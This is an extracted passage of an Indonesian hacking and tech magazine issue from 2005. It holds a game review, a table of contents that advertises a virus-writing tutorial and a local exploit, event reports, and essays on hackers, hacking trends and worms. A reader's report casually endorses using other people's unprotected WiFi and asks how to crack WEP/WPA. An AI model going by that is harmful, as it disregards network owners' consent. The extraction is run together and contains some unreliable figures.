Download - NeoTek Vol. IV - No. 11
-
8/9/2019 NeoTek Vol. IV - No. 11
1/48
erang..., lagi-lagi perang. Tapi perang yangakan anda temukan jika memainkan game iniberbeda. Kok beda? Yah jelas saja beda, ini
hanya game atau permainan yang mengambil ceritaperang. Jadi tidak perlu takut, tegang boleh karenamemang menegangkan dan seru sekali.
Pendidikan Sejarah Dunia
Hari gini... masih main ular tangga? Ampun..., segeraberalih ke game ini. Apa untungnya main game ini?Pertanyaan yang bagus, dan inilah jawabannya. Ga-me ini mengambil setting sejarah mengenai perada-ban manusia dari dahulu hingga ke jaman modern
sekarang ini. Cerita mengenai bangsa yang meluas-kan kekuasaannya untuk menjadi pemimpin semuabangsa yang ada di bumi ini. Hitung-hitung sambilbelajar sejarah dunia dari kekuasaan Romawi, Turki,Mongolia, dan lain-lain. Jadi seperti menonton sia-ran Discovery Channel. Selain itu kita akan menge-nal peralatan perang yang kuno sampai kepadayang mutakhir sekarang ini.
Keunggulan Seri ke-2
Game ini bisa dibilang sebagai game penyempurnaandari seri pertamanya, dilengkapi kemampuan 3Ddimana kita bisa melihat ke segala arah yang me-mungkinkan. Untuk kemampuan ini diharuskanuntuk m enggunakan wheel mouse.
Keunggulan lainnya ada pada grafis dimana gambarlebih halus dan jernih, itu yang membuat anda nan-tinya akan beda di depan komputer ketika mencoba
game ini. Ada lagi keunggulannya, tidak menuntutakan kebutuhan konfigurasi komputer yang tinggi,seperti Pentium II 350 ternyata ok juga. Tapi makinbaik konfigurasi komputer anda akan makin mantaphasil yang didapat.
Jika anda pernah memainkan game Rise of Nationyang dikeluarkan oleh Microsoft, terkesan adakemiripan sequelnya walau tidak begitu banyak.Ketika dicari tahu siapa pembuatnya ternyata yangmembuat game Rise of Nation adalah orang yangsama yang membuat game Empire Earth II ini. Nahini yang akan membuat anda terbius jika maingame ini , karena Rise of Nation terbilang sukseskehadirannya karena setting sejarah yang dikemasdalam bentuk game memang asyik untuk disimaksecara langsung didepan mata.
Requirements:
Windows 98/ ME/ 2000/XPMultimedia PC with Pentium II350 MHz or higher processor64 MB of RAMSuper VGA monitor supporting 1024 x 768 resolutionAGP (4 MB) or PCI (8 MB) 3D video card that supports 1024 x
768, 16-bit color resolutionMicrosoft Mouse or compatible pointing deviceDirectX-compatible sound card with speakers or headphones
recommended.
Empire Earth IIEmpire Earth II
PP
NeoSoft
Empire Earth II dari Sierra Entertainment (www.sierra.com) persembahan game terbaru yang
merupakan lanjutan dari seri pertamanya, mungkin akan mengikuti jejak terdahulunya menjadigame paling sukses se-antero jagat. Keunggulan yang dimiliki oleh game ini dibanding dengan
yang pertama adalah kemampuan 3D-nya yang membuat kita bisa melihat ke segala arah.
Keunggulan lain adalah..., mau tahu? Jajal segera game ini.
Build an Empire That Spans the AgesBuild an Empire That Spans the Ages
-
8/9/2019 NeoTek Vol. IV - No. 11
2/48
Vol. IV No. 11 NeoTek 1
HomePage
NEOTEKNEOTEKDunia Teknologi Baru
Harga NeoTek + CD:
Rp22.000,- (P. Jawa)
Rp22.000,- (Luar P. Jawa)
Salam!Salam!
indows bukan lagi operating system yang baru,hampir diseluruh dunia orang mengenalnya dan
bahkan menggunakannya karena kemudahan da-lam mengoperasikannya, maka Windows dicap sebagaiOperating System yang Friendly User.
Kejayaan yang terbesar yang pernah dimiliki oleh BillGates raja Microsoft yang sekarang ini mulai memasukirelung-relung bisnis high-end. Kejayaan Bill Gates sedangdi uji, dengan begitu banyaknya hadir virus yang menye-rang komputer-komputer yang menggunakan Windows.Waspadailah..., apalagi anda pengguna Windows.
Redaksi
Windows Security:Windows Security:Dari Scumware sampai WormDari Scumware sampai Worm
WW
? Pengguna Windows lebih banyak dari pengguna Linux atau OS lainnya, dibalik itu ada
bahaya yang sedang mengintai.
Bagaimana menghubungi NEOTEK?NEOTEK?KONTRIBUSI [email protected]
SURAT [email protected]
PEMASARANHedhi Sabaruddin, 0812-1891827
CHATROOM DI DALNET#neoteker
ADMINISTRASI IKLANTel. 021-5481457 Fax. 021-5329041
SIRKULASI NEOTEKTel. 021-5481457
ALAMAT REDAKSI4 Cairnhi ll Rise#05-01 The CairnhillSingapore 229740Telp. +65-67386482email: [email protected]
MILIS PARA NEOTEKERhttp:/ / groups.yahoo.com/ group/ majalahneotek
Footprinting
Scanning
Enumeration
Gaining Access
EscalatingPrivilege
Pilfering
Covering Tracks
CreatingBackdoors
Denial of
Service
Lengkapi pengetahuan hackingdan PC security anda denganberlangganan majalah NeoTek:
HubungiAswan BakriTel. (021) 5481 457HP. (0812) 9572043 (Aswan)
email:[email protected]: Aswan Bakri
-
8/9/2019 NeoTek Vol. IV - No. 11
3/48
2 NeoTek Vol. IV No. 11
Daftar Isi
Daftar IsiDaftar Isi
NeoTek Vol. IV No. 11NeoTek Vol. IV No. 11
Situs NeoTek www.neotek.co.id
Jadikan situs NeoTek sebagai pangkalan Anda berselancarLink LangsungKunjungi situs-situs yang dibahas dimajalah NeoTek dengan sekali kliklewat situs NeoTek.
NeoTek versi PDFKehabisan NeoTek di kota Anda?Dapatkan saja versi PDF-nya.
DownloadTersedia juga download di situsNeoTek selain dari situs aslinya
Layanan Rupa-rupa NeoTekChannel # neoteker di DalnetNgobrol ramai-ramai sesama NeoTeker
Web Chat RoomKini tidak usah jauh-jauh untuk ngobrollangsung dengan sesama NeoTeker
Maili ng ListIni yang paling ramai. Segera ikutanberbagi pengalaman berinternet!
NeoTeker Offi cial Portalhttp:/ / www.neoteker.or.idSitus komunikasi antar Neoteker.
Neoteker Internet Radiohttp:/ / dj.neoteker.or.id:8000
NeoRubrikNeoRubrik
NeoStyleNeoStyle
NeoTutorNeoTutor
Kontribusi HackerKeberadaan Hacker antara
Pro dan Kontra, tetap saja memilikikontribusi yang penting untuk
perkembangan komputer.
6
Hacking Trend 2005Catatan kecil mengenai isu
Hacking yang akan menjadi trend di
tahun 2005.
7
NeoStartNeoStartInternet WormsMemahami lebih jauh menge-
nai cacing komputer yang sebenarnyamemiliki nama keren yaitu Autonomous
Intrusion Agents.
9
ScumWareBiasa berselancar di Internet?
Inilah bacaan yang penting sebelum
anda berhadapan dengan ScumWare.
14
Social EngineeringTeknik Hacking yang berba-
haya dan sulit ditanggulangi.
16
Membuat Virus 486Belajar membuat virus dengan
Assembly Langguage Programming.
18
Photo Editing:Clone Effect
Melakukan manipulasi photo dengan
memberi effect tertentu ternyata dapat
membrikan hasil yang memuaskan.
45
eMbedded VB:Aplikasi Plot3D
Membuat aplikasi 3 dimensi yang
sederhana dengan rumus matematika.
24
eMbedded VB:Aplikasi TicTacToe
Melengkapi bahasan membuat game
di Pocket PC yang sederhana dan
mengasyikkan.
28
eMbedded VB:Aplikasi Puzzle
Membuat aplikasi game puzzle seder-
hana yang mengasyikkan.
26
SwishMax:Presentasi Animasi
Membuat makalah presentasi plus
dengan animasinya.
46
FOKUS VOL. IV NO. 11FOKUS VOL. IV NO. 11
WINDOWS SECURITY
Worms - Scumware - Uti lManWINDOWS SECURITY
Worms - Scumware - UtilMan
-
8/9/2019 NeoTek Vol. IV - No. 11
4/48
NeoSoft
NeoProfil
NeoTek Vol. IV No. 12
Sisi Gelap Peer-to-peerFile SharingMasih ingat dengan Napster?Sharing file mp3 yang pernah ada
yang kini sudah enghilang karenadianggap melanggar Hak Cipta.Bagaimana sistem file sharing hadir?
Tunggu bahasan yang akan datang
yang akan mengungkap rahasiatersebut berikut sisi gelap yang
menyertai sistem ini.
Linux File SharingMelakukan file sharing dari Linux ke
Windows, apakah mungkin? Jawaban-
nya adalah mungkin. Tunggu bahasanini dan anda akan membuktikannya
ternyata bisa dilakukan.
Empi re Erat h II
Buil d an Emeperor0
Editorial Office4 Cairnhill Rise
#05-01 The Cairnhill
Singapore 229740
Telp. +65-67386482
Business OfficeGedung Cahaya Palmerah 503
Jl. Palmerah Utara III No. 9
Jakarta 11480Telp. 021-5481457
Fax. 021-5329041
Bank
Bank BNI
a.n. PT NeoTek Maju Mandiri
No. rekening 070.001709720.001
Bank Central Asia(khusus untuk langganan)
Aswan BakriNo. rekening 0940544131
Pemimpin Umum
Fachri Said
Pemimpin Redaksi
Kosasih Iskandarsjah
Redaktu r Ahli
Onno W. Purbo
Michael S. Sunggiardi
Pemimpi n Usaha
Fahmi OemarDadang Krisdayadi
Redaktur Pelaksana
MA Rody Candera
Sekretaris Redaksi
Marni
Webmaster
Supriyanto
Sirkulasi
Hedhi Sabaruddin
Adm. Langganan
KRISHNAdiSTRIBUTOR
Iklan dan PromosiGianto Widianto
Keuangan
Aswan Bakri
3
4
5
War game dengan setting
sejarah perkembangan
peradaban manusia.
44
Seminar Hacking Overview18Desember 2004UIN Jakarta
Laporan WiFi di TaiwanOleh: Imam Isrowi (TenagaKerja Indonesia di Taiwan)
Klak KlikEmpire Earth
Build an EmperorThat Spans the Ages
Cerita dari Singapura
Daftar Isi CD NeoTekSpyRemoval - HoneyPot - Java
- Smartphone Program - eVBSource Code - eVBPaperWhite - Pocket PC
program - Empire Earth IIDemo Version.
NeoRagam
Vol. IV No. 11 NeoTek 3
NeoTeknoNeoTekno
Windows Securi ty:Solusi Puisi Cinta
Mengatasi virus puisi cinta yang cukup
membuat panik jika tidak tahu cara
mengatasinya.
31
HoneyPot:Anti-Spam BerbasisJava
Bahasan lanjutan mengenai Honeypot,
membuat Anti-Spam berbasis Java.
19
HoneyPot:HoneyPot denganPhyton
Bahasan lanjutan mengenai Honeypot,
membuat Honeypot menggunakan
Phyton.
22
Windows Securi ty:Utak-Atik UserAccount
Membahas sekuritas dan efektifitas
yang berkaitan dengan User Account.
29
Windows Security:KeePass PasswordSafe
Menggunakan password yang berbe-
da untuk tiap account yang dimiliki
seringkali merepotkan. Trik berikut
dapat membantu anda.
33
Windows Securi ty:Gaining Access Tool
AccessDiver, tool yang berguna ketika
mencapai tahapan Gaining Access
dalam anantomi proses hacking.
34
Windows Securi ty:Utility ManagerExploit
Menambah dan memperbaiki Utility
Manager Local Exploit yang dimiliki
oleh WinXP.
35
Daftar Isi
Computer Secur it y:Port dan bahayanya
Mengenal port lebih jauh berikut
bahayanya yang memanfaatkan port
sebagai jalan penyerangan.
39
-
8/9/2019 NeoTek Vol. IV - No. 11
5/48
4
NeoRagam
GAME BULAN INI
Empire Earth IIBuild an Emperor
93.3 MB
ari awal peradabanmanusia, keinginanuntuk memperluas kekua-saan sudah ada walaupunharus dengan jalan perang.
Games yang mengambilsetting dari sejarah ini as-yik untuk dimainkan, me-nguji kemampuan andasebagai pemimpin suatubangsa untuk menunduk-kan bangsa lain. Menjadibangsa pemimpin seluruhbangsa yang ada di bumi.
Berawal dari jaman yang
masih sederhana perala-tan perangnya sampaimenuju masa moderndengan peralatan perangcanggih.
- Wi n 95/98/N T/XP
- DirectX 8.0 or Direct-Xcompatible SVGA videocard
- Pentium 950 MHz or higher
- 64 MB RAM
- Super VGA monitorsupporting 1024 x 768resolution
- AGP (4 MB) or PCI (8 MB) 3Dvideo card that supports1024 x 768, 16-bit colorresolution
- Microsoft Mouse orcompatible point ing device
- 32x CD ROM drive
Klak Klik
NeoTek Vol. IV No. 11
D
ni laporan hasil perja-lanan Neotek ketika
kunjungan ke Singapura.Negara kecil tapi memilikitingkat perekonomian yangbaik dan bisa dikatakan ne-gara maju.
Berbicara TI (Tekn ologi In-formasi), Singapura tidaktertinggal bahkan produk-produk yang dihasilkanoleh teknologi yang caggihseperti saat sekarang in icepat hadir memenuhi pa-sar dan menemani gaya hi-dup warga Singapura. Up-grade wawasan mengenaiTI, Singapura lebih dekatdijangkau dari Indonesia.Oleh sebab itu, jika anda
ingin menyadari bahwasanbahasan teknologi yang di-miliki Neotek selalu lebihcepat dibanding majalahlain yang berbendera tek-nologi. Sebagai Contoh,Bluetooth. Pertama kali Neo-tek membahas Bluetoothyaitu 4 tahun yang lalu(Volume I). Beruntunglahanda pembaca setia Neotek.
Akses Internet
Berbicara mengenai ini yangbikin iri kita pada Singa-
pura. Kapan yach Indonesiabisa seperti Singapura me-ngenai akses internet?
Di Singapura, penggunaakses internet dibagi men-jadi 2 yaitu personal (peng-guna rumahan) dan peru-sahaan. Biaya akses Inter-
net un tuk perusahaan ber-
beda sedikit saja denganbiaya yang ditetapkan ISPyang ada di Indonesia, tapibiaya akses internet untu kpersonal ini yang bikin ke-jutan. Hanya $80/bulan(dengan hitun gan kursRp5.400,00 jadi total biayabulanan un tuk akses inter -net di Singapura bagi peng-guna personal yaituRp432.000,00), kita sudahdapat menikmati akses in-ternet Unlimited dengankecepatan 1500 Mbps (1,5
Gbps).Nanyang Polytechnic
NYP (Nanyang Polytechnic),salah satu perguruan tinggiyang ada di Singapura yanginterest terhadap pendidikanyang memanfaatkan tekno-
logi yang nanti hasilnya
dibutuh kan oleh industri,kini membuka jurusan ba-ru yang diberi nama Digi-tal Entertainment Techno-logy. Jika di Indonesia adaDigital Studio.
Digital EntertainmentTechnology memakai tek-nologi informasi untukmenciptakan dan mema-sang hiburan , seperti efekvisual, animasi dan per-mainan komputer.
Anda tertarik? Buka situs-
nya di www.nyp.edu.sg danternyata di Singapura ba-nyak orang Indonesia jugayang suka berbelanja kare-na relatif murah, katanyagitu...
CERITA DARI SINGAPORE
I
School of Information Technology, Nanyang Polytechnic. Programpendidikan setingkat diploma untuk jurusan teknologi digitalentertainment. Di Indonesia ada Digital Studio.
Kampus modern NanyangPolytechnic, Singapura..
-
8/9/2019 NeoTek Vol. IV - No. 11
6/48
Vol. IV No. 11 NeoTek 5
NeoRagam
acking O verview. Be-gitu t opik seminar
yang diadakan oleh BadanEksekutif Mahasiswa UINJakarta pada tanggal 18Desember 2004.
Menambah Wawasan
Acara ini diadakan bertu -juan untuk menambah wa-wasan mengenai hacking,oleh sebab itu topik yangdipilih yaitu HackingOverview.
Acara ini dikemas denganmelibatkan NeoTeker baiksebagai pembicara maupunsebagai demo hacking. JimGeovedi, yang aktif pada
Bellua Asia Pasifik sebagai Information SecurityConsultantjuga ikut ambilbagian membagikan penge-tahuannya kepada peserta.Peserta akhirnya t idak ha-nya saja tahu apa itu danini tentang hacking tetapijuga plus mengetahui arahhacking itu nantinya jikaberkeinginan terjun seba-gai professional worker.
Dani Firmansyah m enyem-patkan diri hadir di acaratersebut, menambah nilaitersendiri bagi peserta t er-hadap sosok yang sempatmenggegerkan TI KPU.
Antusias Peserta
Antusias peserta terhadapacara terlihat sangat positifdan baik sekali, terbuktidengan penuhny a kursi
yang ada dan juga ternyatapeserta wanita tidak kalahjumlahnya dibanding pe-serta pria. Acara yang dimu-lai pada pukul 09.30 WIBdan berakhir pada sore ha-rinya mendekati pukul17.30, ternyata tidak me-mungut biaya yang tidakmahal alias murah dan sa-ngat terjangkau bagi kan-tong mahasiswa. Ada yangpernah jadi mahasiswa?
Acara berakhir sukses danbanyak cerita yang terukir,tunggu berita kegiatan paraNeoTeker mengisi waktudengan kegiatan positif.Yes Hacking and No Dr ugs
Berikut adalah orang-orangyang t erlibat mendukungacara:
Pembicara:
1. A. Zakaria2. Ody3. Jim Geovedy
Demo:
1. Andi Ismayadi2. Beta Andri3. Ricky4. Yoki S
aya menyampaikan ten-tang Wifi (Frek 2,4 Ghz
di Taiwan khususnya wilayahTaichung (Taiwan Tengah).
Saya berkeliling di Taichungdalam radius 2 Km persegidengan membawa PDA ber-wifi. Terny ata banyak sekali
Hotspot, AP atau SSID yangsaya jumpai. Dalam area ter -sebut, di pusat bisnis elektro-nik yang paling banyak AP.Sepertinya private AP. Jadijangkauannya tidak jauh. Halini ditunjukkan kalau kita pin-dah tempat, maka AP (SSID)tersebut tidak terdeteksi lagialias hilang.
Namun yang paling kuat dayapancarnya ada 2 Hotspot Out-door. Yaitu Easy-Up danMobeelan (SSID=Mobitai).Namun keduanya bayar alias
langganan, tapi masih mem-berikan akses Free dengan
cara telepon pakai Handphoneselama 1 menit ke nomor ter-tentu, dan akan dikirimi SMSberisi Username dan Password.satu menit telepon kita diberi20 Menit OnLine. Jadi setelahconnect dengan SSID Mobitai,maka akan muncul halaman
login di Browser kita. Baru ki-ta menelpon 1 menit, dan 5 de-tik kemudian kita sudah men-dapat Username dan Password.Setelah kita masukkan, kitasudah bisa browsing 20 menit.
Jika kita jalan-jalan ke Aparte-men yang kira-kira ada WiFi,disana akan ditemukan banyaksekali AP Private. Yang ternyatakadang-kadang tidak di pro -teksi (Encrypt). Kita tinggalnyantol saja maka kita sudahbisa browsing sepuasnya.
Tapi jika yang punya tahu ada
yang nyantol, maka AP dima-tikan. Dan bila menemukan
AP/SSID yang di proteksi, se-ring kita diminta setting Proxy.Ada yang tahu cara masukatau bobol WEP or WPA? Ka-lau mau benar-benar FREE,kita pergi ke kampus atau se-kolah yang dipasang HotspotOutdoor Free. Browsing se-
puasnya, dan kecepatannyasangat memu askan. SetelahIcon Connect muncul, kitalangsung bisa browsing.
Kapan ya negeri kita bisa se-perti ini. Rasanya jadi betahtinggal di negeri orang.
Kami sedang mengumpulkandana bantuan untuk saudarakita di Aceh. Kami didukungoleh Palang Merah Taiwan(Taichung), sehingga kami ju-ga boleh menerima sumbangandari orang Taiwan. Rencana-nya akhir bulan ini kita akan
kumpulkan jadi satu seluruhTaiwan atas nama TKI Taiwan.
Kami juga selalu cek beritaterakhir di www.airputih.or.iddan kami rangkum, kami fotocopy dan kemu dia kami sebar-kan ke teman-t eman TKI diTaiwan atau di pasang di papan-papan pengumuman yang adadi warung-warung Indonesia
di Taiwan.Sekian laporan kami, atas per-hatian r ekan-rekan, kami ucap-kan terima kasih. Salam darikami, TKI Taiwan.
Informasi tambahan
Laporan lainnya mengenaiW iFi di Taiwan pernah dimuat di majalah NeoTek Vol.IV No. 09, di bagian N eoInbox(Neoteker MenjawabNeoteker).
SEMINAR HACKING OVERVIEW DI UIN (UNIVERSITAS ISLAM NEGERI) JAKARTA
Laporan WiFi (2,4 GHz) di Taiwan Imam Isrowi ([email protected])
H
S
Seminar Hacking Overview di Universitas Islam Negeri Jakarta yangmelibatkan NeoTeker sebagai pembicara. Acara juga dihadiri olehsesepuh hacking Indonesia seperti Dani Firmansyah dan Jim Geovedi.
-
8/9/2019 NeoTek Vol. IV - No. 11
7/48
6
NeoRubrik
NeoTek Vol. IV No. 11
EMAJUAN TEKNOLOGI INFORMASI
yang sangat pesat saat ini masihmempertanyakan keberadaan
hacker bagi beberapa kelompok masya-
rakat yang kurang mendapatkan infor-masi lengkap tentang siapa sebenarnyayang dimaksud dengan hacker danperan yang dimainkannya bagi kema-juan teknologi informasi.
Susah memang kalau sebuah persepsiyang sudah terbentuk di masyarakatdimana kini menjadi patokan dasar un-tuk memahami siapa sebenarnya hackeritu. Ada yang harus dipahami kembalibahwa hacker itu bukanlah sebuah pe-ngakuan dari orang yang jago kompu-ter tapi lebih kepada pemberian pang-kat atau gelar bagi orang-orang yang
sangat mahir dan berbakat dalam halpemrograman dan teknologi jaringan.
Pertanyaannya, kenapa hanya pemro-gramman dan jaringan? Tentu yangharus dimengerti bahwa kemajuanteknologi komputer dan telekomuni-kasi terbentuk karena daya olah ataukreatifitas manusia dalam memprogramsebuah sistem dan aplikasi. Kemajuanteknologi komunikasi sekarang ini ju-ga merupakan hasil dari olah kreatifi-tas manusia dalam teknologi jaringan.Tidak dapat di pungkiri keberadaan tek-nologi internet merupakan hasil kontri-busi dari para hacker di seluruh dunia,
dengan ketrampilannya mampu me-nyambungkan elektron-elektron me-lalui kabel dan media udara (ether) kedalam digit-digit data yang dapat di-mengerti oleh sistem komputer.
Bicara tentang persepsi hacker, saat iniada 2 pendapat yang muncul di masya-rakat dan kedua pendapat itu salingbertentangan. Bagi orang yang awamteknologi (gaptek) akan melihat sosokhacker sebagai tokoh hitam yang ja-hat, pekerjaannya hanya merusak sis-tem komputer orang lain. Sementarapendapat yang lain mengatakan bahwa
hacker adalah jagoannya komputeryang bisa menembus lapisan sekuriti
di sebuah jaringan atau sistem komputer.Persepsi pertama tentu negatif karenamelihat sosok hacker dari tindakannyayang seringkali membobol sistem kom-
puter milik orang lain walaupun sebe-narnya penulis yakin orang yang me-mahami persepsi ini juga tidak menge-tahui apakah si hacker itu merusakatau tidak. Persepsi kedua terkesan po-sitif karena yang dilihat adalah kemam-puan yang dimiliki oleh hacker itu sen-diri menurutnya hebat dan sangat ah li.
Perbedaan persepsi inilah terkadangmenjadikan keberadaan hacker masihsering ditakuti oleh beberapa kelompokmasyarakat bisnis. Mungkin juga ka-rena si pemilik usaha/ bisnis terlalu se-ring mendengarkan berita di media
tentang hacker yang suka menyerangdan sering terlalu kreatif menembussistem-sistem level keamanan kom-puter di jaringan.
Hacker tidak selalu menyerang tapi jugasangat paham dengan metode defensifdan banyak memiliki solusi dalambertahan di jaringan internet yang liar,bahkan sebenarnya hacker memilikikode etik yang ketat dan salah satu kodeetiknya adalah memberitahu kepadapemilik sistem akan adanya lubang/bugsecurity di sistem yang dia analisa.Maka jangan heran bila beberapa hackerprofesional lebih terbuka untuk
menjalin komunikasi dengan systemadministrator sebuah perusahaan, dansebenarnya keduanya bisa saling ber-kolaborasi dan bekerja sama dalammembangun sistem pertahanan yanglebih baik. Hacker profesional lebihsenang jika di panggil sebagai WhiteHatatau dalam istilah umum pakarkeamanan jaringan dan bukan hackerkarena dia konsisten dengan profesinyasementara julukan hacker hanyamerupakan pemberian (assign) darikomunitas. Bagi kalangan bisnissebenarnya keberadaan hacker bisa dimanfaatkan untuk mengamankan asset-
asset perusahaan yang nilainyamungkin bisa ratusan milyar perhari
kecuali jika Anda siap untuk kehilanganasset Anda yang nilainya besar itu.
Sedikit saran untuk para kalangan bis-nis yang menggantungkan assetnyapada seutas kabel di komputer yangdatanya berseliweran di jaringan kom-puter, perlu dipahami bahwa data lossbisa terjadi oleh beberapa hal dianta-ranya karena virus, aplikasi yang error,sistem yang tidak bekerja maksimal,gangguan fisik dan teknis akibat sistemyang t idak di-manajemen dengan baik,kelemahan penerapan policy keamanan,serta serangan-serangan dari int ruderdi jaringan.
Hacker professional dapat menawar-kan konsep dan metode yang lebihbaik dalam soal keamanan jaringan di
sistem yang Anda miliki karena meto-dologi risk assassment (analisa dampak& kerusakan sistem) yang diterapkanhacker menggunakan patokan dasarsecurity (advisory) yang t iap hari ter-update (tiap hari para hacker professionalmendapatkan report dari komunitassecurity internasional tentang bug-bugdi sistem komputer), dan hacker profes-sional jelas memiliki standarisasi secu-rity yang jelas dalam mengamankanjaringan karena dia memiliki sistempolicy dan network policy yang lebihbaik karena didukung resources dankeahlian yang dia miliki.
Sudah saatnya bagi kalangan bisnis un-tuk memberikan kesempatan bagi parahacker untuk terjun di dunia IT secaraterbuka dan proffesional agar aktifi-tasnya dalam menyalurkan adrenalindi jaringan internet yang liar bisa le-bih tersalurkan secara positif dan pe-nulis yakin akan banyak manfaatyang bisa diambil karena terbuktikeberadaan internet yang dibuat olehpara hacker hingga saat ini berkem-bang menjadi teknologi yang luarbiasa dan sangat membantu aktifitastelekomunikasi yang mana memba-
ngun effektifitas dan effesiensi kerja.
KONTRIBUSI HACKER DALAM PERKEMBANGAN KOMPUTER
K
Pro dan kontra terhadap keberadaan hacker antara pandangan negatifdan pandangan yang positif, menghadirkan deretan panjang daftar
pertanyaan-pertanyaan yang membutuhkan jawaban sebagai solusi.
Dani Firmansyah([email protected]) mengupasHackeryangsesungguhnya demi menyatukan persepsi kita bersama mengenai
hacker berikut kontribusinya dalam perkembangan komputer yang
sekarang ini anda rasakan sendiri nilai plus dari kemajuan komputer
bersama internet didalamnya.
-
8/9/2019 NeoTek Vol. IV - No. 11
8/48
Vol. IV No. 11 NeoTek 7
NeoRubrik
ELAMAT TAHUN BARU 2005. Ti-dak terasa saat ini kita sudahberada di tahun 2005. Sembari
menyelesaikan beberapa tugas, saya
menyempatkan diri untuk membuatcatatan kecil mengenai trend hackingtahun ini berdasarkan informasi yangsaya kumpulkan dari berbagai sumberdi Internet.
Hacking selalu menjadi isu yang me-narik. Namun apakah yang menjaditrend di tahun 2005 ini? Mari kitasimak beberapa topik hacking yangsaya prediksikan akan menjadi trenddi tahun 2005 ini.
1. Web Systems Hacking
Pada pertengahan tahun 2004, peris-
tiwa defacement pada website tabulasinasional Pemilu 2004 (tnp.kpu.go.id)dari KPU menjadi headline news dibanyak media lokal maupun interna-sional.
Pernyataan bahwa firewall dapat me-lindungi serangan hacker terpatahkanbegitu saja karena penyerang m eman-faatkan protokol yang firewall-friendly.Web attacks dapat melintasi firewallbegitu saja karena memang bukan tu -gas firewall untuk melakukan inspeksicontent dari setiap packet terutamapada protokol yang diijinkan melintas.
Seiring dengan semakin banyaknyapemanfaatan aplikasi web seperti webforum, news/art icles publishing tools,dan lain-lain. Maka tahun 2005 ini,diperkirakan proses auditing dari webcodes akan mendapat perhatian yangsangat tinggi.
2. Database Hacking
Jika pada tahun-tahun sebelumnyaperusahaan banyak mencurahkanperhatiannya pada perlindunganjaringan namun sedikit yang mem-berikan perhatian unt uk melindungisalah aset penting mereka yaitu
database. Pada tahun 2005 ini, data-base security akan mendapatkan
perhatian extra, terlebih dari merekayang meny impan data penting danrahasia. Hal lain yang memicu adalahtingginya aksi penyerangan dan
pengerusakan dengan menggunakanSQL injection pada tahun lalu.
3. Honeypot Hacking
Honeypot adalah sebuah resourceyang dipergunakan untuk mempela-jari "blackhat." Pada dasarnya sebuahhoneypot adalah sebuah sistem kom-puter yang tidak memiliki nilai lebihdan diharapkan tidak ada seorang punyang memiliki ketertarikan padanya,sehingga kalau ada seorang yang ter-tarik, sepertinya orang tersebut ter -tarik untuk kepentingan yang ilegal.
Dari sisi eksternal, agak sulit dibeda-kan antara honeypot dan sistimkomputer biasa. Sehingga identifikasisebuah sistim adalah sebuah honeypotdiperkirakan akan menjadi trendtahun 2005 ini.
4. Passive Information Gathering
Information gathering adalah tahapawal sebuah proses hacking. Padaacara DEFCON 12 (www.defcon.org),Johnny Long (johnny.ihackstuff.com)mempresentasikan metode passiveinformation gathering menggunakansearch engine.
Ada banyak metode pencarian yangbisa diperoleh dari websitenya. Danpada tahun 2005 ini, metode penca-rian secara pasif akan semakinberkembang lagi.
5. Hardware Hacking
Pernah berpikir untuk menggunakaniPod (www.apple.com/ ipod) untukmenyerang dan menguasai sistemkomputer lain? Sepertinya tidak mung-kin, bukan?
Namun tidak menurut MaximilianDornseif (md.hudora.de), seorangpeneliti dari RWTH Aachen Univer-
sity (www.rwth-aachen.de) yangmempresentasikan metode hackingdengan judul
0wn3d by an iPod: Firewire/1394 Issues(md.hudora.de/presentations/#firewire-pacsec) pada konferensi PacSec.jp(www.pacsec.jp) pada bulan Novem -ber 2004 lalu.
Tahun 2005 diperkirakan trend hard-ware hacking akan meningkat. Salahsatu contohnya adalah
USB DMA Attack
yang akan dipresentasikan David Maynor(www.bellua.com/bcs2005/asia05.speakers.html#david) pada konferensi
Bellua Cyber Security 2005(www.bellua.com/bcs2005)
di Jakarta pada bulan Maret 2005.
Topik hardware hacking lain yangtidak kalah menariknya adalahBluetooth (www.defcon.org/html/defcon-12/dc-12-speakers.html#laurie) hacking.
Jim Geovedi kini akt if sebagaiInformation Security Consultantpada PT Bellua A sia Pacific.
HACKING TRENDS 2005
S
Memasuki dan mulai sedikit demi sedikit menapaki tahun 2005, tahun
2004 kini sudah berada di belakang. Mengamati perkembangan
Internet yang terus melaju, masalah hacking sudah pasti hal yang asyik
untuk diperbincangkan. Jim Geovedi ([email protected])membeberkan catatan kecilnya mengenaiTrend Hacking Tahun
2005, khusus untuk dibagikan kepada para pembaca NeoTek.
-
8/9/2019 NeoTek Vol. IV - No. 11
9/48
NeoStart
Vol. IV No. 11 NeoTek 9
NDA TENTU MASIH INGAT IKLAN DI MEDIA TELEVISI
beberapa tahun silam, Anak anda cacingan? Ber-hubungan dengan cacing, tulisan ini membahascacing yang berbeda bentuk. Cacing-cacing di
Internet (Worms) adalah Autonomous Intrusion Agentsyang mampu melakukan penggandaan diri dan menyebardengan memanfaatkan kelemahan-kelemahan sekuriti(security flaws) pada services yang u mum digunakan.Worm bukanlah sebuah fenomena baru, ditemukan per-tama kali penyebarannya pada tahun 1988. Worms telah
menjadi sebuah ancaman yang mematikan di Internet,walaupun sebagian besar kasus yang terjadi secara spesi-fik adalah pada sistim berbasis Windows. Beberapa jenisworms terbaru memanfaatkan electron ic mail (e-mail)sebagai medium penyebarannya.
1. Metode Akti vasi dan MekanismePenyebaran
Perbedaan mendasar ant ara worm dan virus terletak padabagaimana mereka membutuhkan intervensi user untukmelakukan penggandaan diri dan menyebar menginfeksisistim komput er. Virus lebih lambat dalam melakukan pe-nyebaran jika dibandingkan dengan worm. Namun virusmempunyai kemampuan lebih untuk menghindari detek-
si program-program anti-virus yang berusaha mengiden-tifikasi dan mengontrol penyebaran virus pada sistimkomputer. Namun pada praktek penyebarannya sebuahvirus dapat menjadi sebuah worm.
Untuk memudahkan pembahasan, kita membatasi termi-nologi antara worm dan virus dengan mempertimbang-kan metode aktivasi yang dilakukan oleh sebuah worm,proses yang dilakukan sebuah worm untuk mengeksekusipada sebuah sistim komputer dan mekanisme penyeba-ran, proses yang memungkinkan sebuah worm berkelanadari satu host ke host yang lain.
1.1. Metode Aktivasi
Pengertian bagaimana worm dapat aktif pada sebuah host
berhubungan erat dengan kemampuan worm un tuk me-nyebarkan diri, sejumlah worms dapat diatur untuk aktifsecara langsung (activated nearly immediately), sementa-ra yang lain dapat menunggu beberapa hari, minggu ataubahkan bulan untuk dapat teraktivasi dan kemudianmenyebarkan-dirinya.
